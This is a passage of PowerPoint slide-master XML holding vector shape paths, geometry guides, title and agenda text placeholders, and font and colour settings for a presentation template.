                    <a:pt x="176" y="179"/>
                    <a:pt x="176" y="178"/>
                    <a:pt x="175" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="175"/>
                    <a:pt x="172" y="174"/>
                    <a:pt x="171" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="173"/>
                    <a:pt x="169" y="172"/>
                    <a:pt x="168" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="171"/>
                    <a:pt x="161" y="167"/>
                    <a:pt x="160" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="160"/>
                    <a:pt x="160" y="157"/>
                    <a:pt x="160" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="154"/>
                    <a:pt x="160" y="153"/>
                    <a:pt x="161" y="152"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="71" y="68"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="68"/>
                    <a:pt x="71" y="68"/>
                    <a:pt x="71" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="71"/>
                    <a:pt x="74" y="73"/>
                    <a:pt x="77" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="74"/>
                    <a:pt x="85" y="73"/>
                    <a:pt x="88" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="70"/>
                    <a:pt x="94" y="68"/>
                    <a:pt x="98" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="66"/>
                    <a:pt x="100" y="65"/>
                    <a:pt x="101" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="65"/>
                    <a:pt x="102" y="66"/>
                    <a:pt x="102" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="66"/>
                    <a:pt x="102" y="67"/>
                    <a:pt x="102" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="68"/>
                    <a:pt x="100" y="69"/>
                    <a:pt x="99" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="71"/>
                    <a:pt x="91" y="74"/>
                    <a:pt x="87" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="78"/>
                    <a:pt x="83" y="79"/>
                    <a:pt x="81" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="82"/>
                    <a:pt x="76" y="81"/>
                    <a:pt x="73" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="76"/>
                    <a:pt x="69" y="74"/>
                    <a:pt x="67" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="70"/>
                    <a:pt x="66" y="70"/>
                    <a:pt x="65" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="70"/>
                    <a:pt x="65" y="70"/>
                    <a:pt x="65" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="72"/>
                    <a:pt x="64" y="74"/>
                    <a:pt x="63" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="79"/>
                    <a:pt x="61" y="81"/>
                    <a:pt x="60" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="86"/>
                    <a:pt x="57" y="88"/>
                    <a:pt x="57" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="94"/>
                    <a:pt x="58" y="96"/>
                    <a:pt x="58" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="98"/>
                    <a:pt x="57" y="99"/>
                    <a:pt x="56" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="104"/>
                    <a:pt x="52" y="108"/>
                    <a:pt x="50" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="117"/>
                    <a:pt x="46" y="122"/>
                    <a:pt x="46" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="130"/>
                    <a:pt x="46" y="133"/>
                    <a:pt x="46" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="137"/>
                    <a:pt x="45"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1"/>
                    <a:pt x="38" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="121"/>
                    <a:pt x="37" y="122"/>
                    <a:pt x="37" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="127"/>
                    <a:pt x="35" y="131"/>
                    <a:pt x="36"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4"/>
                    <a:pt x="67" y="176"/>
                    <a:pt x="64" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="177"/>
                    <a:pt x="63" y="177"/>
                    <a:pt x="62" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="179"/>
                    <a:pt x="65" y="181"/>
                    <a:pt x="66" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="185"/>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2"/>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3" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="173"/>
                    <a:pt x="115" y="172"/>
                    <a:pt x="115" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="172"/>
                    <a:pt x="116" y="173"/>
                    <a:pt x="117" y="174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="178"/>
                    <a:pt x="117" y="182"/>
                    <a:pt x="115" y="185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="188"/>
                    <a:pt x="114" y="190"/>
                    <a:pt x="114" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="194"/>
                    <a:pt x="114" y="195"/>
                    <a:pt x="116" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="191"/>
                    <a:pt x="118" y="186"/>
                    <a:pt x="119" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="178"/>
                    <a:pt x="120" y="174"/>
                    <a:pt x="119" y="171"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="167"/>
                    <a:pt x="118" y="163"/>
                    <a:pt x="118" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="156"/>
                    <a:pt x="118" y="153"/>
                    <a:pt x="119" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="147"/>
                    <a:pt x="122" y="145"/>
                    <a:pt x="126" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="145"/>
                    <a:pt x="126" y="145"/>
                    <a:pt x="126" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="142"/>
                    <a:pt x="129" y="140"/>
                    <a:pt x="132" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="137"/>
                    <a:pt x="141" y="138"/>
                    <a:pt x="146" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="138"/>
                    <a:pt x="142" y="137"/>
                    <a:pt x="140" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="119"/>
                    <a:pt x="135" y="97"/>
                    <a:pt x="126" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="97"/>
                    <a:pt x="134" y="103"/>
                    <a:pt x="136" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="116"/>
                    <a:pt x="140" y="123"/>
                    <a:pt x="139" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="135"/>
                    <a:pt x="136" y="137"/>
                    <a:pt x="132" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="138"/>
                    <a:pt x="128" y="137"/>
                    <a:pt x="128" y="134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="132"/>
                    <a:pt x="127" y="130"/>
                    <a:pt x="127" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="121"/>
                    <a:pt x="126" y="114"/>
                    <a:pt x="124" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="102"/>
                    <a:pt x="121" y="98"/>
                    <a:pt x="117" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="94"/>
                    <a:pt x="117" y="94"/>
                    <a:pt x="117" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="86"/>
                    <a:pt x="112" y="79"/>
                    <a:pt x="107" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="70"/>
                    <a:pt x="105" y="67"/>
                    <a:pt x="106" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="62"/>
                    <a:pt x="106" y="60"/>
                    <a:pt x="107" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="55"/>
                    <a:pt x="106" y="54"/>
                    <a:pt x="104" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="52"/>
                    <a:pt x="97" y="50"/>
                    <a:pt x="94" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="48"/>
                    <a:pt x="91" y="46"/>
                    <a:pt x="91" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="43"/>
                    <a:pt x="91" y="41"/>
                    <a:pt x="92" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="37"/>
                    <a:pt x="95" y="36"/>
                    <a:pt x="98" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="37"/>
                    <a:pt x="101" y="38"/>
                    <a:pt x="102" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="42"/>
                    <a:pt x="103" y="45"/>
                    <a:pt x="102" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="48"/>
                    <a:pt x="101" y="49"/>
                    <a:pt x="102" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="51"/>
                    <a:pt x="107" y="50"/>
                    <a:pt x="107" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="43"/>
                    <a:pt x="107" y="39"/>
                    <a:pt x="105" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="31"/>
                    <a:pt x="100" y="29"/>
                    <a:pt x="96" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="30"/>
                    <a:pt x="88" y="33"/>
                    <a:pt x="87" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="39"/>
                    <a:pt x="87" y="40"/>
                    <a:pt x="87" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="43"/>
                    <a:pt x="87" y="45"/>
                    <a:pt x="87" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="45"/>
                    <a:pt x="83" y="45"/>
                    <a:pt x="81" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="45"/>
                    <a:pt x="80" y="45"/>
                    <a:pt x="80" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="46"/>
                    <a:pt x="78" y="45"/>
                    <a:pt x="78" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="41"/>
                    <a:pt x="77" y="38"/>
                    <a:pt x="76" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="35"/>
                    <a:pt x="76" y="34"/>
                    <a:pt x="76" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="32"/>
                    <a:pt x="73" y="30"/>
                    <a:pt x="70" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="31"/>
                    <a:pt x="67" y="32"/>
                    <a:pt x="66" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="39"/>
                    <a:pt x="63" y="44"/>
                    <a:pt x="66" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="50"/>
                    <a:pt x="67" y="51"/>
                    <a:pt x="68" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="51"/>
                    <a:pt x="69" y="50"/>
                    <a:pt x="69" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="48"/>
                    <a:pt x="68" y="48"/>
                    <a:pt x="67" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="45"/>
                    <a:pt x="65" y="42"/>
                    <a:pt x="66" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="37"/>
                    <a:pt x="71" y="36"/>
                    <a:pt x="73" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="39"/>
                    <a:pt x="75" y="42"/>
                    <a:pt x="75" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="46"/>
                    <a:pt x="74" y="47"/>
                    <a:pt x="73" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="48"/>
                    <a:pt x="72" y="48"/>
                    <a:pt x="72" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="51"/>
                    <a:pt x="69" y="52"/>
                    <a:pt x="66" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="54"/>
                    <a:pt x="65" y="55"/>
                    <a:pt x="64" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="57"/>
                    <a:pt x="64" y="58"/>
                    <a:pt x="65" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="60"/>
                    <a:pt x="67" y="61"/>
                    <a:pt x="68" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="66"/>
                    <a:pt x="74" y="66"/>
                    <a:pt x="78" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="66"/>
                    <a:pt x="87" y="64"/>
                    <a:pt x="91" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="62"/>
                    <a:pt x="98" y="61"/>
                    <a:pt x="101" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="58"/>
                    <a:pt x="102" y="57"/>
                    <a:pt x="103" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="58"/>
                    <a:pt x="103" y="59"/>
                    <a:pt x="103" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="60"/>
                    <a:pt x="102" y="61"/>
                    <a:pt x="102" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="63"/>
                    <a:pt x="91" y="65"/>
                    <a:pt x="86" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="69"/>
                    <a:pt x="78" y="69"/>
                    <a:pt x="74" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="68"/>
                    <a:pt x="72" y="68"/>
                    <a:pt x="71" y="68"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="73" y="45"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="43"/>
                    <a:pt x="73" y="41"/>
                    <a:pt x="72" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="39"/>
                    <a:pt x="71" y="39"/>
                    <a:pt x="70" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="40"/>
                    <a:pt x="70" y="40"/>
                    <a:pt x="70" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="41"/>
                    <a:pt x="71" y="42"/>
                    <a:pt x="71" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="44"/>
                    <a:pt x="72" y="45"/>
                    <a:pt x="73" y="45"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="97" y="39"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="40"/>
                    <a:pt x="99" y="41"/>
                    <a:pt x="100" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="43"/>
                    <a:pt x="101" y="43"/>
                    <a:pt x="101" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="41"/>
                    <a:pt x="100" y="40"/>
                    <a:pt x="99" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98"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446"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5762" y="1153"/>
              <a:ext cx="3" cy="4"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 2"/>
                <a:gd name="T1" fmla="*/ 1 h 3"/>
                <a:gd name="T2" fmla="*/ 1 w 2"/>
                <a:gd name="T3" fmla="*/ 2 h 3"/>
                <a:gd name="T4" fmla="*/ 0 w 2"/>
                <a:gd name="T5" fmla="*/ 3 h 3"/>
                <a:gd name="T6" fmla="*/ 0 w 2"/>
                <a:gd name="T7" fmla="*/ 1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1"/>
                    <a:pt x="2" y="2"/>
                    <a:pt x="1" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2"/>
                    <a:pt x="0" y="2"/>
                    <a:pt x="0" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1"/>
                    <a:pt x="1" y="1"/>
                    <a:pt x="2" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="0"/>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Freeform 447"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5774" y="1153"/>
              <a:ext cx="5" cy="2"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 4"/>
                <a:gd name="T1" fmla="*/ 0 h 2"/>
                <a:gd name="T2" fmla="*/ 3 w 4"/>
                <a:gd name="T3" fmla="*/ 1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1"/>
                    <a:pt x="3" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="1"/>
                    <a:pt x="3" y="1"/>
                    <a:pt x="4" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="2"/>
                    <a:pt x="3" y="2"/>
                    <a:pt x="2"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5" name="Freeform: Shape 484"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-2" y="0"/>
            <a:ext cx="6762953" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 7294818"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 3978914 w 7294818"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 4057397 w 7294818"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 5871241 w 7294818"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 7294818 w 7294818"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 5871241 w 7294818"/>
              <a:gd name="connsiteY5" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 4057397 w 7294818"/>
              <a:gd name="connsiteY6" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 3978914 w 7294818"/>
              <a:gd name="connsiteY7" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 729481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4818" h="6858000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3978914" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4057397" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5871241" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7294818" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5871241" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4057397" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3978914" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="685800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a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="498" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683257" y="1562893"/>
            <a:ext cx="5258796" cy="3732214"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="274320" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="7200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Freeform: Shape 445"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334508" y="0"/>
            <a:ext cx="1522984" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1319784 w 1522984"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1522984 w 1522984"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 203200 w 1522984"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1522984"/>
              <a:gd name="connsiteY3" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 1319784 w 152298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984" h="6858000">
                <a:moveTo>
                  <a:pt x="1319784" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1522984" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203200" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1319784" y="0"/>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a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42694960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Title only_2">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a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="865" y="0"/>
            <a:ext cx="12191945" cy="6858001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-811" y="1"/>
            <a:ext cx="12192811" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha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a:xfrm>
            <a:off x="1"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rgbClr val="002050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>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222462475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Agenda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3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="263524" y="1420824"/>
            <a:ext cx="11660789" cy="4852747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="91440"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="C0000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1177" y="6603024"/>
            <a:ext cx="12192313" cy="265884"/>
            <a:chOff x="-1200" y="6644680"/>
            <a:chExt cx="12436794" cy="360970"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8"/>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0" name="TextBox 9"/>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133778147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93195"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6" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269241" y="1297501"/>
            <a:ext cx="11653523" cy="1988942"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1961"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="224011" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="448021" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="67203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9388711" y="6536998"/>
            <a:ext cx="2742188" cy="191648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
